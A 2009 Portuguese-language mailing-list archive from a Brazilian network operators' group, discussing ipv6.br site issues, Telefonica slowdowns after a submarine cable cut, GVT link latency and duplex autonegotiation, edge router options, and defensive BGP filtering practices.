In-Reply-To: <4A26D01F.5030301@conectcor.com.br> References: <4A26D01F.5030301@conectcor.com.br> Message-ID: aqui pra mim esta normal, inclusive estou fazendo o treinamento de ipv6 la 2009/6/3 Welisson : > Boa tarde a todos > > Gostaria de saber se est? ocorrendo alguma atualiza??o no site www.ipv6.br, > pois o mesmo encontra-se com mensagem do apache, como quem acabou de > instalar. > > ATT. > > -- > Welisson > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- ------------ Itamar Reis Peixoto e-mail/msn: itamar at ispbrasil.com.br sip: itamar at ispbrasil.com.br skype: itamarjp icq: 81053601 +55 11 4063 5033 +55 34 3221 8599 From marcoshack at gmail.com Wed Jun 3 16:36:55 2009 From: marcoshack at gmail.com (Marcos Hack) Date: Wed, 3 Jun 2009 16:36:55 -0300 Subject: [GTER] =?utf-8?q?Seguran=C3=A7a_de_router_BGP?= In-Reply-To: References: Message-ID: <842e837b0906031236j2eaf4abaxeb55a4eec8ca478d@mail.gmail.com> Boa tarde Patrick, J? fazem alguns anos que n?o estou trabalhando com BGP no dia-a-dia, mas um dos cuidados que voc? deve tomar se for multihomed (mais de dois peers BGP) ? filtrar corretamente as rotas divulgadas para cada peer, enviando somente as rotas das suas redes para evitar que seu AS seja usado como "transito" indevidamente, onde tr?fego n?o direcionado para as suas redes s?o roteados atrav?s da sua infraestrutura. Outra coisa ? filtrar pacotes com endere?o de origem de redes privadas (RFC1918 [1]), n?o era muito comum mas cheguei a pegar situa??es de operadoras roteando pacotes assim para o meu AS e gerando tr?fego desnecess?rio. Bom, esses s?o os que lembro de cabe?a no momento. Att., Marcos Hack. [1] http://tools.ietf.org/html/rfc1918 2009/6/3 Patrick Barreto Petronetto : > Pessoal, > O que geralmente voc?s fazem para proteger os roteadores que rodam BGP? H? alguma medida de seguran?a que deve ser aplicada (configurada) no equipamento para evitar algum tipo de ataque? > > Valeu! > > Patrick Barreto Petronetto > patrick at vol.net.br > > Antes de imprimir, pense em sua responsabilidade e compromisso com o MEIO AMBIENTE. > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From guhcampos at gmail.com Wed Jun 3 16:39:28 2009 From: guhcampos at gmail.com (Gustavo Campos) Date: Wed, 3 Jun 2009 16:39:28 -0300 Subject: [GTER] Problemas no Acesso ao site ipv6.br In-Reply-To: <9c0c824e0906031238w7c38cc3bp593fb01277dbc2ac@mail.gmail.com> References: <4A26D01F.5030301@conectcor.com.br> <9c0c824e0906031238w7c38cc3bp593fb01277dbc2ac@mail.gmail.com> Message-ID: <19834d100906031239x22f1eddp4dd782e972a3f990@mail.gmail.com> Aqui o www funciona, quem t? dando pau ? o curso.ipv6.br 2009/6/3 Emiliano Martins : > estou acessando normalmente. > > 2009/6/3 Welisson > >> Boa tarde a todos >> >> Gostaria de saber se est? ocorrendo alguma atualiza??o no site www.ipv6.br, >> pois o mesmo encontra-se com mensagem do apache, como quem acabou de >> instalar. >> >> ATT. >> >> -- >> Welisson >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > > > -- > Emiliano Martins > iK1 Tecnologia Ltda > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- -- Gustavo Campos Sistemas de Informa??o - UFMG Analista de Suporte - Telbrax LTDA From pizzolo at gmail.com Wed Jun 3 16:44:15 2009 From: pizzolo at gmail.com (Patrich Pizzolo) Date: Wed, 3 Jun 2009 16:44:15 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> Message-ID: <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> Obrigado pelas respostas, n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps Full-Duplex! Por?m o problema est? bem isolado, j? coloquei diversos notebooks e desktops e o problema sempre persiste sim! Creio que seja exatamente o caso de porta do Switch Datacom no qual o Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta e ouvidoria para verificarem isto e eles continuam afirmando categoricamente que n?o h? problema! Alguma id?ia? 2009/6/3 Juliano S. Nascimento > > > > > Voce checou poss?veis port-mismatch ? > Auto-negocia??o X portas for?adas ? > > > > Corre uma lenda por a? que as portas fastethernet devem ser > for?adas a > > 100Mb/s. Na verdade essa hist?ria > remonta h? anos quando existia um bug na > > > negocia??o de alguns equipamentos que faziam os mesmos > negociarem como > > half. > > Isso acabou e s? sobrou a > lenda. > > > > A regra ?: > > > > - > Auto-negocia??o com auto-negoci???o > > - Porta for?ada (sem autoneg) com Porta for?ada > > > > Qualquer outra combina??o trar? > problemas. > > > > Voc? colocou 1 notebook ligado > direto no link para eliminar problemas com > > sua rede, seu > firewall, etc? > > > > Grato. > > > > 2009/6/3 > Patrich Pizzolo > > > >> Bom dia > a todos, > >> gostaria de ter uma opini?o dos ilustres > colegas que integram esta > >> lista. > >> Tenho um link > de 10Mbps por fibra e ap?s um problema em um switch da GVT > >> meu > >> tempo de resposta entre a Eth do meu router e > a do router da gvt que s?o > >> interligados por uma fibra > est? chegando a picos de at? 946ms com uma > >> > m?dia > >> em torno de 10ms, isso com o link isolado e > j? testei com diversos > >> outros > >> routers e > sempre obtenho os mesmos tempos de resposta, definitivamente > >> > n?o > >> tenho problema nesta ponta. Possuo um outro link > com a BrT e est? tudo > >> normal com tempo de resposta > excelente sem nenhuma varia??o deste tipo. > >> > Estou nesta situa??o h? 7 dias e o pessoal da > operadora insiste em dizer > >> que > >> est? > tudo normal. J? nem aguento mais falar com eles... > >> > >> Algu?m tem alguma id?ia? > >> > >> No momento estou pensando em acionar e cancelar o link. > > Caro, > > Tivemos o mesmo problema algum tempo atras com a > GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal > configurados e n?o terem resultados positivos com esta > afirma??o, trocaram nossa porta no Switch deles, resolvendo > nosso problema. > > OBS: Alegaram que a vlan estava com uma > configura??o errada, ocasionado tais problemas. > > > > >> > >> Abra?os, > >> > Obrigado! > >> -- > >> gter list > https://eng.registro.br/mailman/listinfo/gter > >> > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Abra?os, Patrich Pizzolo IT Coordinator +55-48-9944-9090 +55-47-8407-7768 pizzolo at gmail.com Skype: pizzolo_br MSN: patrich_pizzolo at hotmail.com SL: Xpiz Beam Taikodom: Deathwing_br From erick at heinrich.com.br Wed Jun 3 16:50:04 2009 From: erick at heinrich.com.br (Erick Robert Heinrich) Date: Wed, 3 Jun 2009 16:50:04 -0300 Subject: [GTER] Problemas no Acesso ao site ipv6.br In-Reply-To: <9c0c824e0906031238w7c38cc3bp593fb01277dbc2ac@mail.gmail.com> References: <4A26D01F.5030301@conectcor.com.br> <9c0c824e0906031238w7c38cc3bp593fb01277dbc2ac@mail.gmail.com> Message-ID: <936997910906031250k269976a6y6b6ae4af2bd035@mail.gmail.com> A mensagem do apache est? no endere?o do curso: http://curso.ipv6.br/ [ ]'s, ______________________ Erick Robert Heinrich e-mail: erick at heinrich.com.br site: www.heinrich.com.br prefixo: PU2KEH Heinrich Elos 2009/6/3 Emiliano Martins > estou acessando normalmente. > > 2009/6/3 Welisson > > > Boa tarde a todos > > > > Gostaria de saber se est? ocorrendo alguma atualiza??o no site > www.ipv6.br, > > pois o mesmo encontra-se com mensagem do apache, como quem acabou de > > instalar. > > > > ATT. > > > > -- > > Welisson > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > Emiliano Martins > iK1 Tecnologia Ltda > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From herbert at scw.net.br Wed Jun 3 17:15:08 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Wed, 3 Jun 2009 17:15:08 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> Message-ID: <200906031715.08601.herbert@scw.net.br> On Wed 03 Jun 2009 15:07:02 NOC NeoGrid wrote: > IMHO, o pior de tudo, conforme o Juliano falou... na "nossa ?rea"... ? a > falta de transpar?ncia com o cliente. Tenho a impress?o de que treinam o > atendente do 0800 a ativar o modo "enrolation" quando informam algum > "problema" com a operadora. Isso me lembra uma frase que li hoje, onde > terminava com... Telec?mica.. Ontem tive problemas com um link Algar (CTBC), o atendimento foi super r?pido, o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava falando, anotaram todos os dados pertinentes e em poucos minutos algu?m n?vel 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem o problema ligaram novamente perguntando como estava o link! Quem est? acostumado com a Telefonica (com aquele 0800 que quando consegue falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e nunca resolvem nada) se espanta com um atendimento como esse (que relatei sobre a Algar). -- Herbert From vbenincasa.listas at gmail.com Wed Jun 3 17:36:36 2009 From: vbenincasa.listas at gmail.com (Victor Benincasa) Date: Wed, 3 Jun 2009 17:36:36 -0300 Subject: [GTER] Ainda problemas com a telefonica References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com><7a152a290906030739k31258d23u946589daf9888a3a@mail.gmail.com><86b352050906031005p37d2b382kccc34b982fb3d8c4@mail.gmail.com> Message-ID: Mais informa??es sobre o problema da Telef?nica: Topologia da TIWS: http://www.e-mergia.com/es/descargas/mapaDeRedInternacionalTIWS.pdf Looking Glass dos roteadores: http://www.e-mergia.com/es/herraIP.html Nota de imprensa da Telef?nica sobre o incidente: "... Una vez detectado este hecho entr? en funcionamiento la ruta de respaldo por el Atl?ntico, por lo que la conectividad en nuestro pa?s no se ha visto interrumpida. La compa??a, a trav?s del operador internacional Tiws, quien provee el servicio de conexi?n para los servicios de datos y Speedy de Telef?nica, est? realizando esfuerzos para mejorar el respaldo y mitigar la sensaci?n de lentitud que actualmente perciben nuestros clientes residenciales y empresariales. ... El punto de corte de cable ha sido ubicado en altamar, a 200 kil?metros de la costa de Guatemala (Puerto Barrios), lo que hace compleja y dif?cil la reparaci?n definitiva, que podr?a llevar entre siete y quince d?as de trabajos en la zona. " Fonte: http://saladeprensa.telefonica.es/documentos/terremoto_honduras.pdf -- Victor Benincasa http://netbit.com.br ----- Original Message ----- From: "Humberto Sartini" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Wednesday, June 03, 2009 2:11 PM Subject: Re: [GTER] Ainda problemas com a telefonica Pina, Nesse caso somente o pessoal que conhece a topologia da Tiws poderia explicar :-) -- [ ]'s Humberto Sartini Certificado LPIC-1 http://www.hss.blog.br PGP KEY ID 0xB32E5C8D 2009/6/3 Antonio Carlos Pina > Humberto, > > A Telefonica contou essa historia para todo mundo que abriu chamado. As > minhas d?vidas sobre o assunto na verdade s?o: > > a) Por que o cabo ?tico que liga o Peru ? Am?rica do Norte via Honduras > afetou o Brasil ? > b) Por que o tr?fego PING e TRACEROUTE n?o foi afetado junto com TCP ? > > Sinceramente n?o sei se essa quest?o do cabo explica o problema. Penso que > a > hist?ria ? maior que isso. > > Abs > > > 2009/6/3 Humberto Sartini > > > Pessoal, > > > > Isso ? reflexo do terremoto que teve em Honduras em 29/05/09. O cabo > > submarino rompeu e o trabalho para recuperar n?o deve ser f?cil. > > > > http://www.telecompaper.com/news/SendArticle.aspx?u=False > > > > -- > > [ ]'s > > Humberto Sartini > > Certificado LPIC-1 > > http://www.hss.blog.br > > PGP KEY ID 0xB32E5C8D > > > > 2009/6/3 Mike Tesliuk > > > > > Foi informado aqui na lista uma informa??o referente a um problema com > > > rompimento de fibra, um de nossos usu?rios disse que a telefonica > > > passou hoje a mesma informa??o para ele informando que a estrutura de > > > backup est? sobrecarregada. > > > > > > 2009/6/2 Victor Benincasa : > > > > Mike e colegas de lista, > > > > > > > > Tamb?m estamos com o mesmo problema. Temos servidores na ThePlanet > > > > (Texas-EUA), e h? cerca de 5 dias alguns clientes nossos que > > > > utilizam > > > links > > > > da Telef?nica (em especial o Speedy) est?o relatando problemas no > > > > recebimento de e-mails (timeout). > > > > > > > > Ping (pacotes ICMP) trafegam sem problema, j? pacotes TCP tem tido > uma > > > > taxa de perda m?dia de 50%! > > > > > > > > Algu?m tem alguma luz ou contato com pessoal t?cnico da Telefonica? > > > > > > > > -- > > > > Victor Benincasa > > > > http://netbit.com.br > > > > > > > > > > > > ----- Original Message ----- From: "Mike Tesliuk" > > > > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > > > > > > > Sent: Tuesday, June 02, 2009 2:53 PM > > > > Subject: [GTER] Ainda problemas com a telefonica > > > > > > > > > > > > Ol? Amigos, > > > > > > > > Eu queria saber se algu?m est? tendo problemas com a telefonica > > > > ainda > > > > (estamos a uma semana ja) ? > > > > > > > > Temos nossa rede em miami ( 204.16.0.0/22 ) e usu?rios / provedores > > > > que utilizam a estrutura da telefonica n?o est?o chegando at? nossos > > > > servidores (com qualidade), n?s mesmos temos uma lp da telefonica e > > > > tive que trocar para uma conex?o da net para podermos trabalhar > > > > enquanto este problema n?o se resolve, basicamente eu tenho ping ok > > > > atrav?s da telefonica, a rota pelo que me parece eu passo por dentro > > > > da estrutura de adsl da telefonica, abaixo coloco um exemplo da > > > > minha > > > > rota. > > > > > > > > traceroute to 204.16.0.1 (204.16.0.1), 30 hops max, 40 byte packets > > > > 1 gw-spo-lins-tel (189.109.27.1) 0.881 ms 0.834 ms 0.766 ms > > > > 2 189-109-5-185.customer.tdatabrasil.net.br (189.109.5.185) 2.096 > > > > ms 2.021 ms 2.016 ms > > > > 3 * * * > > > > 4 201-0-3-65.dsl.telesp.net.br (201.0.3.65) 2.462 ms 2.663 ms > > 2.532 > > > ms > > > > 5 201-63-253-142.customer.tdatabrasil.net.br (201.63.253.142) > 2.810 > > > > ms 2.729 ms 201-63-253-146.customer.tdatabrasil.net.br > > > > (201.63.253.146) 2.754 ms > > > > 6 Xe3-1-0-0-grtsanem2.red.telefonica-wholesale.net.10.16.84.in-add > > > > (84.16.10.17) 4.943 ms 4.008 ms > > > > Xe7-2-0-0-grtsanem2.red.telefonica-wholesale.net (84.16.10.233) > 4.138 > > > > ms > > > > 7 Xe8-1-0-0-grtmiabr6.red.telefonica-wholesale.net (84.16.15.22) > > > > 117.589 ms 117.636 ms 117.604 ms > > > > 8 Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net(213.140.36.229) > > > > 162.865 ms Xe0-0-0-0-grtwaseq4.red.telefonica-wholesale.net > > > > (213.140.36.153) 152.998 ms > > > > Xe11-0-0-0-grtwaseq4.red.telefonica-wholesale.net (213.140.36.229) > > > > 162.824 ms > > > > 9 Pccwbtn-0-3-0-0-grtwaseq4.red.telefonica-wholesale.net > > > > (213.140.53.22) 315.858 ms 199.672 ms 252.659 ms > > > > 10 braslink.fe3-4.br01.mia02.pccwbtn.net (63.218.113.62) 183.716 > ms > > * > > > * > > > > > > > > > > > > Meus clientes est?o tendo dificuldades para utilizar servi?os de > email > > > > e ftp, sites, eles tentam acessar fica carregando, quando tentam > > > > novamente eles conseguem ( ou n?o ) > > > > > > > > Agrade?o informa??es. > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From security at neogrid.com Wed Jun 3 18:00:38 2009 From: security at neogrid.com (NOC NeoGrid) Date: Wed, 3 Jun 2009 18:00:38 -0300 Subject: [GTER] RES: RES: Ainda problemas com a telefonica In-Reply-To: <200906031715.08601.herbert@scw.net.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br> Message-ID: Herbert, Isso me lembra a "antiga" Embratel e "antiga" Impsat... bons tempos... infelizmente agora o nivelamento ? "por baixo"! Dilson. -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Herbert Faleiros Enviada em: quarta-feira, 3 de junho de 2009 17:15 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] RES: Ainda problemas com a telefonica On Wed 03 Jun 2009 15:07:02 NOC NeoGrid wrote: > IMHO, o pior de tudo, conforme o Juliano falou... na "nossa ?rea"... ? a > falta de transpar?ncia com o cliente. Tenho a impress?o de que treinam o > atendente do 0800 a ativar o modo "enrolation" quando informam algum > "problema" com a operadora. Isso me lembra uma frase que li hoje, onde > terminava com... Telec?mica.. Ontem tive problemas com um link Algar (CTBC), o atendimento foi super r?pido, o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava falando, anotaram todos os dados pertinentes e em poucos minutos algu?m n?vel 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem o problema ligaram novamente perguntando como estava o link! Quem est? acostumado com a Telefonica (com aquele 0800 que quando consegue falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e nunca resolvem nada) se espanta com um atendimento como esse (que relatei sobre a Algar). -- Herbert -- gter list https://eng.registro.br/mailman/listinfo/gter From marconipp at hotmail.com Wed Jun 3 17:53:56 2009 From: marconipp at hotmail.com (Marconi Pereira) Date: Wed, 3 Jun 2009 20:53:56 +0000 Subject: [GTER] roteador de borda In-Reply-To: <200906031715.08601.herbert@scw.net.br> References: <7a152a290906021053y2addcb01j7957456a70abc58c@mail.gmail.com> <4A26B858.30008@cyberweb.com.br> <200906031715.08601.herbert@scw.net.br> Message-ID: Caros, estou pesquisando sobre solu??o de roteador de borda para link entre 100 e 155Mbps. 1-qual roteador Cisco adequado (alguem tem ideia do preco do equip + IOS?); 2-Vyatta? (eh estavel, eh facil de configurar, tem algum feature de QoS?) 3-servidor dell com quagga? (nao rodo BGP, mas pode surgir a necessidade) Obrigado, M. _________________________________________________________________ Windows Live? SkyDrive?: Get 25 GB of free online storage. http://windowslive.com/online/skydrive?ocid=TXT_TAGLM_WL_SD_25GB_062009 From gustavo at nexthop.com.br Wed Jun 3 18:28:34 2009 From: gustavo at nexthop.com.br (Gustavo Rodrigues Ramos) Date: Wed, 3 Jun 2009 18:28:34 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> Message-ID: <73d1f88a0906031428v145fdacl5ceb931d2d098b1a@mail.gmail.com> Pessoal, 2009/6/3 Antonio Carlos Pina : > Voce checou poss?veis port-mismatch ? Auto-negocia??o X portas for?adas ? > > Corre uma lenda por a? que as portas fastethernet devem ser for?adas a > 100Mb/s. Na verdade essa hist?ria remonta h? anos quando existia um bug na > negocia??o de alguns equipamentos que faziam os mesmos negociarem como half. > Isso acabou e s? sobrou a lenda. A lenda ainda "existe" para os equipamentos que n?o seguem o padr?o (IEEE 802.3). > A regra ?: > > - Auto-negocia??o com auto-negoci???o > - Porta for?ada (sem autoneg) com Porta for?ada A regra vale para portas 10/100 Mbps. Para 1 Gbps ? sempre auto-negocia??o. Gustavo. From frederick at dahype.org Wed Jun 3 18:43:07 2009 From: frederick at dahype.org (Renato Frederick) Date: Wed, 3 Jun 2009 17:43:07 -0400 Subject: [GTER] RES: Problemas GVT - o que fazer? In-Reply-To: <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> Message-ID: Tive a alguns meses este mesmo problema, um cisco 17XX que a CTBC locou ligado ao enlance metroethernet n?o negociava direito ocorrendo perda de pacotes. Detalhe, n?o sei porque colocaram um cisco entre o metroethernet e meu firewall, sendo que em outro cen?rio semelhante a OI ligou direto ao meu firewall um link metro tamb?m. Via das d?vidas se a porta for at? 100Mb for?o a negocia??o. Giga como falaram n?o tem como, ? auto. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Patrich Pizzolo > Enviada em: quarta-feira, 3 de junho de 2009 16:44 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] Problemas GVT - o que fazer? > > Obrigado pelas respostas, > n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 > dias > atr?s este problema aqui, s? ficou ok quando forcei minha eth para > 100Mbps > Full-Duplex! > Por?m o problema est? bem isolado, j? coloquei diversos notebooks e > desktops > e o problema sempre persiste sim! > > Creio que seja exatamente o caso de porta do Switch Datacom no qual o > Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de > conta > e ouvidoria para verificarem isto e eles continuam afirmando > categoricamente > que n?o h? problema! > > Alguma id?ia? > > > 2009/6/3 Juliano S. Nascimento > > > > > > > > > > Voce checou poss?veis port-mismatch ? > > Auto-negocia??o X portas for?adas ? > > > > > > Corre uma lenda por a? que as portas fastethernet devem ser > > for?adas a > > > 100Mb/s. Na verdade essa hist?ria > > remonta h? anos quando existia um bug na > > > > > negocia??o de alguns equipamentos que faziam os mesmos > > negociarem como > > > half. > > > Isso acabou e s? sobrou a > > lenda. > > > > > > A regra ?: > > > > > > - > > Auto-negocia??o com auto-negoci???o > > > - Porta for?ada (sem autoneg) com Porta for?ada > > > > > > Qualquer outra combina??o trar? > > problemas. > > > > > > Voc? colocou 1 notebook ligado > > direto no link para eliminar problemas com > > > sua rede, seu > > firewall, etc? > > > > > > Grato. > > > > > > 2009/6/3 > > Patrich Pizzolo > > > > > >> Bom dia > > a todos, > > >> gostaria de ter uma opini?o dos ilustres > > colegas que integram esta > > >> lista. > > >> Tenho um link > > de 10Mbps por fibra e ap?s um problema em um switch da GVT > > >> meu > > >> tempo de resposta entre a Eth do meu router e > > a do router da gvt que s?o > > >> interligados por uma fibra > > est? chegando a picos de at? 946ms com uma > > >> > > m?dia > > >> em torno de 10ms, isso com o link isolado e > > j? testei com diversos > > >> outros > > >> routers e > > sempre obtenho os mesmos tempos de resposta, definitivamente > > >> > > n?o > > >> tenho problema nesta ponta. Possuo um outro link > > com a BrT e est? tudo > > >> normal com tempo de resposta > > excelente sem nenhuma varia??o deste tipo. > > >> > > Estou nesta situa??o h? 7 dias e o pessoal da > > operadora insiste em dizer > > >> que > > >> est? > > tudo normal. J? nem aguento mais falar com eles... > > >> > > >> Algu?m tem alguma id?ia? > > >> > > >> No momento estou pensando em acionar e cancelar o link. > > > > Caro, > > > > Tivemos o mesmo problema algum tempo atras com a > > GVT. Depois de muitos testes e alegarem que nossos servidores estavam > mal > > configurados e n?o terem resultados positivos com esta > > afirma??o, trocaram nossa porta no Switch deles, resolvendo > > nosso problema. > > > > OBS: Alegaram que a vlan estava com uma > > configura??o errada, ocasionado tais problemas. > > > > > > > > >> > > >> Abra?os, > > >> > > Obrigado! > > >> -- > > >> gter list > > https://eng.registro.br/mailman/listinfo/gter > > >> > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > > > -- > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > Abra?os, > > Patrich Pizzolo > IT Coordinator > +55-48-9944-9090 > +55-47-8407-7768 > pizzolo at gmail.com > Skype: pizzolo_br > MSN: patrich_pizzolo at hotmail.com > SL: Xpiz Beam > Taikodom: Deathwing_br > -- > gter list https://eng.registro.br/mailman/listinfo/gter From antoniocarlospina at gmail.com Wed Jun 3 18:55:31 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Wed, 3 Jun 2009 18:55:31 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> Message-ID: <86b352050906031455r6822f719n8ba064b5e9f19de4@mail.gmail.com> Pessoal, por favor. Se um lado est? FOR?ADO, o outro precisar? ficar FOR?ADO tamb?m. Se um lado est? AUTONEG, o outro fica em AUTONEG. N?o vamos misturar os sintomas com o resultado. Exemplos citados: a) Vers?o de firmware antiga (e com bug). Cisco ? o exemplo cl?ssico (e roteadores pequenos ethernet s?o DE FATO 10Mb/s Half ou 100Mb/s Half) b) Configura??o "misteriosa" de um dos lados (por exemplo, em conversor) que n?o sabemos qual ? e no nosso lado termos que for?ar (porque na verdade o outro lado est? for?ado) c) Equipamentos que n?o adiram ? especifica??o conforme o Gustavo colocou (gra?as a Deus nunca peguei um destes). d) Cabeamento ruim (for?ar a porta mascara o problema) O mais chato ? quando ? publicado nas "revistas especializadas" a balela que "for?ar a porta a 100Mb/s melhora sua performance" e no dia seguinte temos 20 ou 30 clientes reclamando de lentid?o em suas estruturas porque fizeram tal altera??o sem atentar para o fato que a porta de switch tem de mudar junto.... 2009/6/3 Patrich Pizzolo > Obrigado pelas respostas, > n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias > atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps > Full-Duplex! > Por?m o problema est? bem isolado, j? coloquei diversos notebooks e > desktops > e o problema sempre persiste sim! > > Creio que seja exatamente o caso de porta do Switch Datacom no qual o > Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta > e ouvidoria para verificarem isto e eles continuam afirmando > categoricamente > que n?o h? problema! > > Alguma id?ia? > > > 2009/6/3 Juliano S. Nascimento > > > > > > > > > > Voce checou poss?veis port-mismatch ? > > Auto-negocia??o X portas for?adas ? > > > > > > Corre uma lenda por a? que as portas fastethernet devem ser > > for?adas a > > > 100Mb/s. Na verdade essa hist?ria > > remonta h? anos quando existia um bug na > > > > > negocia??o de alguns equipamentos que faziam os mesmos > > negociarem como > > > half. > > > Isso acabou e s? sobrou a > > lenda. > > > > > > A regra ?: > > > > > > - > > Auto-negocia??o com auto-negoci???o > > > - Porta for?ada (sem autoneg) com Porta for?ada > > > > > > Qualquer outra combina??o trar? > > problemas. > > > > > > Voc? colocou 1 notebook ligado > > direto no link para eliminar problemas com > > > sua rede, seu > > firewall, etc? > > > > > > Grato. > > > > > > 2009/6/3 > > Patrich Pizzolo > > > > > >> Bom dia > > a todos, > > >> gostaria de ter uma opini?o dos ilustres > > colegas que integram esta > > >> lista. > > >> Tenho um link > > de 10Mbps por fibra e ap?s um problema em um switch da GVT > > >> meu > > >> tempo de resposta entre a Eth do meu router e > > a do router da gvt que s?o > > >> interligados por uma fibra > > est? chegando a picos de at? 946ms com uma > > >> > > m?dia > > >> em torno de 10ms, isso com o link isolado e > > j? testei com diversos > > >> outros > > >> routers e > > sempre obtenho os mesmos tempos de resposta, definitivamente > > >> > > n?o > > >> tenho problema nesta ponta. Possuo um outro link > > com a BrT e est? tudo > > >> normal com tempo de resposta > > excelente sem nenhuma varia??o deste tipo. > > >> > > Estou nesta situa??o h? 7 dias e o pessoal da > > operadora insiste em dizer > > >> que > > >> est? > > tudo normal. J? nem aguento mais falar com eles... > > >> > > >> Algu?m tem alguma id?ia? > > >> > > >> No momento estou pensando em acionar e cancelar o link. > > > > Caro, > > > > Tivemos o mesmo problema algum tempo atras com a > > GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal > > configurados e n?o terem resultados positivos com esta > > afirma??o, trocaram nossa porta no Switch deles, resolvendo > > nosso problema. > > > > OBS: Alegaram que a vlan estava com uma > > configura??o errada, ocasionado tais problemas. > > > > > > > > >> > > >> Abra?os, > > >> > > Obrigado! > > >> -- > > >> gter list > > https://eng.registro.br/mailman/listinfo/gter > > >> > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > > > > -- > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > Abra?os, > > Patrich Pizzolo > IT Coordinator > +55-48-9944-9090 > +55-47-8407-7768 > pizzolo at gmail.com > Skype: pizzolo_br > MSN: patrich_pizzolo at hotmail.com > SL: Xpiz Beam > Taikodom: Deathwing_br > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From eschoedler at viavale.com.br Wed Jun 3 18:57:29 2009 From: eschoedler at viavale.com.br (Eduardo Schoedler) Date: Wed, 3 Jun 2009 18:57:29 -0300 Subject: [GTER] =?utf-8?q?Seguran=C3=A7a_de_router_BGP?= References: <842e837b0906031236j2eaf4abaxeb55a4eec8ca478d@mail.gmail.com> Message-ID: Al?m do que foi dito, outra coisa importante ? criar filtros no seu roteador para evitar ip spoofing originados na sua rede. S? deixe sair para a internet pacotes onde o src-ip ? um bloco seu MESMO. Abra?os, Eduardo. ----- Original Message ----- From: "Marcos Hack" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Wednesday, June 03, 2009 4:36 PM Subject: Re: [GTER] Seguran?a de router BGP > Boa tarde Patrick, > > J? fazem alguns anos que n?o estou trabalhando com BGP no dia-a-dia, > mas um dos cuidados que voc? deve tomar se for multihomed (mais de > dois peers BGP) ? filtrar corretamente as rotas 